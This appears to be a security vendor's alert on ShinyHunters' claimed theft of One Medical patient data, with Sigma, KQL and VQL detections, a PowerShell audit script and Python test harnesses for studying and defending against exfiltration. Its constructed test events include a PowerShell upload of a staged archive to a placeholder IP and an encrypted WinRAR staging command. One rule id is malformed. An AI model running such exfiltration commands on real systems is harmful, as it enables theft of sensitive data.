The healthcare sector is once again under siege following the announcement that ShinyHunters, a notorious data extortion group, claims to have accessed approximately 8.8 TB of sensitive data from One Medical, an Amazon-owned primary care provider. This incident underscores a grim reality in 2026: threat actors are not just encrypting data; they are siphoning terabytes of PHI (Protected Health Information) for leverage.
For defenders, the magnitude of 8.8 TB is a critical indicator. This volume of data suggests a prolonged dwell time or a high-bandwidth exfiltration channel, likely bypassing standard Data Loss Prevention (DLP) controls. Security teams must assume that perimeter defenses were insufficient and pivot to detecting the behaviors associated with data staging and large-scale egress.
Technical Analysis
While the specific initial access vector (IAV) is under investigation, ShinyHunters historically leverages credential theft, misconfigured cloud storage buckets, or third-party supply chain vulnerabilities to gain a foothold.
Threat Actor Profile: ShinyHunters is an extortion-focused group known for breaching organizations and threatening to leak data unless a ransom is paid. Unlike traditional ransomware operators who prioritize encryption for operational disruption, ShinyHunters focuses on the theft of sensitive intellectual property and PII/PHI.
Attack Chain & Observable Behaviors:
- Initial Access: Likely via compromised credentials or web application vulnerabilities (no specific CVE has been disclosed in this alert).
- Discovery & Staging: The sheer volume (8.8 TB) implies the attacker spent significant time mapping the network and aggregating files. We expect to see the creation of large archives (ZIP, RAR, 7z) or the use of rclone/AzCopy for cloud synchronization.
- Exfiltration: Moving 8.8 TB requires substantial bandwidth. Defenders should look for anomalous spikes in outbound traffic, specifically to non-corporate IP addresses or known cloud storage endpoints used without MFA.
Affected Assets: While One Medical is the confirmed victim, any healthcare provider leveraging cloud-based primary care platforms or extensive electronic health records (EHR) databases is a potential target.
Detection & Response
To identify active exfiltration or staging similar to the One Medical incident, deploy the following detection logic.
SIGMA Rules
---
title: Potential Large Scale Data Staging via Archiving Tools
id: 8a4b2c91-1d3e-4f5a-9b6c-7d8e9f0a1b2c
status: experimental
description: Detects the use of high-compression archiving tools often used to stage large volumes of data for exfiltration, relevant to incidents involving terabytes of stolen data.
references:
    - https://attack.mitre.org/techniques/T1560/
author: Security Arsenal
date: 2026/04/06
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\winrar.exe'
            - '\7z.exe'
            - '\winzip.exe'
            - '\tar.exe'
        CommandLine|contains:
            - '-m0'
            - '-mx9'
            - '-hp'
    condition: selection
falsepositives:
    - Legitimate system backups by administrators
level: high
---
title: Suspicious PowerShell Web Request with Large Data Transfer
id: 9b5c3d02-2e4f-5g6a-0c7d-1e2f3a4b5c6d
status: experimental
description: Detects PowerShell commands utilizing Invoke-WebRequest or similar methods to transfer data, often used in exfiltration scripts.
references:
    - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2026/04/06
tags:
    - attack.exfiltration
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IWR'
            - 'Invoke-RestMethod'
            - 'IRM'
            - 'OutFile'
    filter:
        CommandLine|contains:
            - 'githubusercontent.com'
            - 'microsoft.com'
    condition: selection_img and selection_cli and not filter
falsepositives:
    - Systems management tools
    - Software update scripts
level: medium
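Before deploying the two rules above, it is worth checking their matching semantics against sample events. The following is an added example (not code from the original alert): a minimal evaluator that implements only the modifiers these rules use, with constructed process_creation events, including one benign extraction and one download from a filtered host, to confirm what does and does not fire.

```python
# Added example, not part of the original alert: a minimal evaluator for the two
# Sigma rules above, implementing only the modifiers they use (endswith,
# contains). List values are OR-ed, keys within a selection are AND-ed, and
# string matching is case-insensitive, as in Sigma. Events are constructed.
ARCHIVE_TOOLS = ["\\winrar.exe", "\\7z.exe", "\\winzip.exe", "\\tar.exe"]
ARCHIVE_SWITCHES = ["-m0", "-mx9", "-hp"]
PS_IMAGES = ["\\powershell.exe", "\\pwsh.exe"]
PS_WEB_CMDS = ["Invoke-WebRequest", "IWR", "Invoke-RestMethod", "IRM", "OutFile"]
PS_FILTER_HOSTS = ["githubusercontent.com", "microsoft.com"]

def endswith_any(value, suffixes):
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)

def contains_any(value, needles):
    v = value.lower()
    return any(n.lower() in v for n in needles)

def staging_rule(event):
    """Rule 1: archiver image AND a high-compression/header-encryption switch."""
    return (endswith_any(event["Image"], ARCHIVE_TOOLS)
            and contains_any(event["CommandLine"], ARCHIVE_SWITCHES))

def ps_webrequest_rule(event):
    """Rule 2: selection_img and selection_cli and not filter."""
    return (endswith_any(event["Image"], PS_IMAGES)
            and contains_any(event["CommandLine"], PS_WEB_CMDS)
            and not contains_any(event["CommandLine"], PS_FILTER_HOSTS))

# Constructed process_creation events (not real telemetry)
EVENTS = [
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r"WinRAR.exe a -hpS3cret -m0 D:\stage\export.rar D:\exports\*.csv"},
    {"Image": r"C:\Program Files\7-Zip\7z.exe",  # plain extraction: no alert
     "CommandLine": r"7z.exe x C:\Users\jsmith\Downloads\driver.7z"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -c iwr -Uri https://203.0.113.10/ -Method Post -InFile C:\stage\out.zip"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",  # trusted host: filtered out
     "CommandLine": "pwsh -c Invoke-WebRequest https://raw.githubusercontent.com/org/tool/install.ps1 -OutFile i.ps1"},
]

RULES = {"staging": staging_rule, "ps_webrequest": ps_webrequest_rule}

def evaluate(events=EVENTS):
    """Names of the rules that fire for each event (empty list = no alert)."""
    return [[name for name, fn in RULES.items() if fn(e)] for e in events]
```

Note that the lowercase `iwr` alias in the third event still matches the `'IWR'` value because Sigma string matching is case-insensitive; any hand-rolled port of these rules into a SIEM must preserve that.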
KQL (Microsoft Sentinel / Defender)
// Hunt for high volume outbound network connections indicative of exfiltration
// Note: per-connection byte counters are not part of the standard DeviceNetworkEvents schema in
// Defender for Endpoint; if SentBytes is absent in your tenant, run the same aggregation over a
// firewall or NetFlow table (e.g. CommonSecurityLog, which carries SentBytes) instead.
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where SentBytes > 50000000 // Threshold: 50MB+ per connection
| summarize TotalBytesSent=sum(SentBytes), Count=count() by DeviceName, RemoteIP, RemoteUrl, InitiatingProcessFileName
| where TotalBytesSent > 1000000000 // Threshold: 1GB+ per device/destination/process
| project DeviceName, RemoteIP, RemoteUrl, InitiatingProcessFileName, TotalBytesSent, Count
| top 20 by TotalBytesSent desc

// Look for creation of compressed archives in user directories
DeviceFileEvents
| where Timestamp > ago(3d)
| where ActionType == "FileCreated"
| where FileName endswith ".zip" or FileName endswith ".rar" or FileName endswith ".7z"
| where FolderPath contains "Users"
| extend SizeMB = round(FileSize / 1024.0 / 1024.0, 2) // FileSize is a native DeviceFileEvents column
| where SizeMB > 100 // Greater than 100MB
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, FolderPath, SizeMB
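The egress hunt above applies two thresholds in sequence: a per-connection floor (50 MB) before the aggregation and a per-destination total (1 GB) after it. The following added example (not part of the original alert) replays that logic over constructed flow records to show a blind spot a practitioner should weigh: a transfer split into many parts below the per-connection floor never reaches the aggregate check, so consider aggregating first and filtering afterwards.

```python
# Added example, not part of the original alert: applies the two thresholds of
# the KQL egress hunt to constructed flow records, once with the per-connection
# prefilter (as written) and once aggregating first. Device names, IPs and
# process names are constructed, not real telemetry.
from collections import defaultdict

MB, GB = 1_000_000, 1_000_000_000
PER_CONN_MIN = 50 * MB   # `| where SentBytes > 50000000`
TOTAL_MIN = 1 * GB       # `| where TotalBytesSent > 1000000000`

# Constructed records: (device, remote_ip, process, sent_bytes)
FLOWS = (
    # one bulk upload in a handful of large connections
    [("WS-017", "203.0.113.10", "rclone.exe", 400 * MB)] * 4
    # the same 1.6 GB moved as 200 parts, each below the per-connection floor
    + [("WS-042", "203.0.113.10", "rclone.exe", 8 * MB)] * 200
    # routine browsing: many small connections, small total
    + [("WS-003", "13.107.42.16", "msedge.exe", 2 * MB)] * 30
)

def egress_summary(flows, prefilter=True):
    """Return {(device, remote_ip, process): total_sent} for totals above TOTAL_MIN.
    With prefilter=True, connections at or below PER_CONN_MIN are dropped before
    summing, exactly as the KQL does; with prefilter=False every byte counts."""
    totals = defaultdict(int)
    for device, remote_ip, process, sent in flows:
        if prefilter and sent <= PER_CONN_MIN:
            continue
        totals[(device, remote_ip, process)] += sent
    return {k: v for k, v in totals.items() if v > TOTAL_MIN}

def flagged_devices(flows, prefilter=True):
    """Sorted device names that exceed the 1 GB total under the chosen ordering."""
    return sorted({key[0] for key in egress_summary(flows, prefilter)})
```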
Velociraptor VQL
-- Hunt for recently modified large files that could be staging archives
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs=['C:/Users/**/*.zip', 'C:/Users/**/*.rar', 'C:/Users/**/*.7z'])
WHERE Mtime.Unix > now() - 86400   -- modified within the last 24 hours
  AND Size > 50000000               -- larger than 50 MB
ORDER BY Size DESC
Remediation Script
# Audit Script: Identify Large Archives and Open Network Connections
# Usage: Run as Administrator on suspected endpoints
Write-Host "[*] Scanning for large archives in User Profiles..."
$largeFiles = Get-ChildItem -Path "C:\Users" -Recurse -File -Include *.zip,*.rar,*.7z -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 500MB -and $_.LastWriteTime -gt (Get-Date).AddDays(-2) }
if ($largeFiles) {
    # @() forces an array so .Count is correct when exactly one file matches
    Write-Host "[!] ALERT: Found $(@($largeFiles).Count) suspicious large files." -ForegroundColor Red
    $largeFiles | Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize
} else {
    Write-Host "[+] No large suspicious archives found." -ForegroundColor Green
}
Write-Host "[*] Checking for established non-standard outbound connections..."
# netstat -ano rows look like:  TCP  10.0.0.5:51234  203.0.113.10:8443  ESTABLISHED  1234
# The remote port sits in the foreign-address column, not at the end of the line (that is the PID),
# so the filter must anchor on the column that precedes ESTABLISHED.
$netstat = netstat -ano | Select-String "ESTABLISHED"
$suspiciousPorts = $netstat | Where-Object { $_ -notmatch '^\s*TCP\s+\S+\s+\S+:(443|80)\s+ESTABLISHED' } # Filter common web traffic to reduce noise
if ($suspiciousPorts) {
    Write-Host "[!] Active connections on non-standard ports detected:" -ForegroundColor Yellow
    $suspiciousPorts
}
Remediation
Given the nature of this threat (Data Extortion), immediate containment is paramount to prevent further leakage.
- Identity Compromise Assessment: Assume credentials are compromised. Force a password reset for all accounts with access to the sensitive EHR/PHI databases. Enforce MFA (Multi-Factor Authentication) immediately for all administrative and user access, particularly for cloud portals.
- Cloud Storage Audit: ShinyHunters frequently targets cloud storage. Audit AWS S3 buckets, Azure Blobs, or similar storage for:
  - Publicly accessible ("public-read") settings.
  - Misconfigured IAM policies allowing "List" and "Get" actions to anonymous or external principals.
- Network Egress Controls: Implement strict firewall rules to block unauthorized outbound traffic. Whitelist only necessary IP addresses for data transmission. Inspect SSL/TLS traffic (DPI) to identify exfiltration attempts over encrypted channels.
- Investigate Third-Party Access: Review access logs for third-party vendors or supply chain partners, as these are common vectors for groups like ShinyHunters.
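For the cloud storage audit item above, the bucket-policy half of the check can be done offline against the exported policy JSON. The following is an added example (not code from the original alert or from AWS): it flags Allow statements that grant List/Get actions to anonymous or external principals. The account id and the sample policy are hypothetical; ACL-level "public-read" settings are a separate check not covered here.

```python
# Added example, not part of the original alert: an offline check of an S3
# bucket-policy document for the second audit item above, Allow statements that
# grant List/Get actions to anonymous or external principals. It reads only the
# policy JSON (no AWS credentials); ACL-level public-read is a separate check.
# TRUSTED_ACCOUNT and the sample policy are hypothetical/constructed.
import json

TRUSTED_ACCOUNT = "111111111111"
RISKY_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:list*", "s3:*", "*"}

def _as_list(v):
    return v if isinstance(v, list) else [v]

def principal_scope(principal):
    """Classify a statement's Principal as 'anonymous', 'external' or 'internal'."""
    aws = _as_list(principal.get("AWS", [])) if isinstance(principal, dict) else []
    if principal == "*" or "*" in aws:
        return "anonymous"
    if any(TRUSTED_ACCOUNT not in arn for arn in aws):
        return "external"
    return "internal"

def risky_statements(policy_json):
    """(Sid, scope, actions) for unconditional Allow grants of List/Get to non-internal principals.
    Statements carrying a Condition are skipped here and need manual review."""
    findings = []
    for st in json.loads(policy_json)["Statement"]:
        if st.get("Effect") != "Allow" or "Condition" in st:
            continue
        actions = [a for a in _as_list(st.get("Action", [])) if a.lower() in RISKY_ACTIONS]
        scope = principal_scope(st.get("Principal", {}))
        if actions and scope != "internal":
            findings.append((st.get("Sid", "<no Sid>"), scope, actions))
    return findings

# Constructed policy: one in-account role grant, one anonymous read, one cross-account list
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "AppRole", "Effect": "Allow", "Principal": {"AWS": f"arn:aws:iam::{TRUSTED_ACCOUNT}:role/ehr-app"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::ehr-exports/*"},
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::ehr-exports/*"},
    {"Sid": "PartnerList", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::222222222222:root"},
     "Action": ["s3:ListBucket"], "Resource": "arn:aws:s3:::ehr-exports"},
]})
```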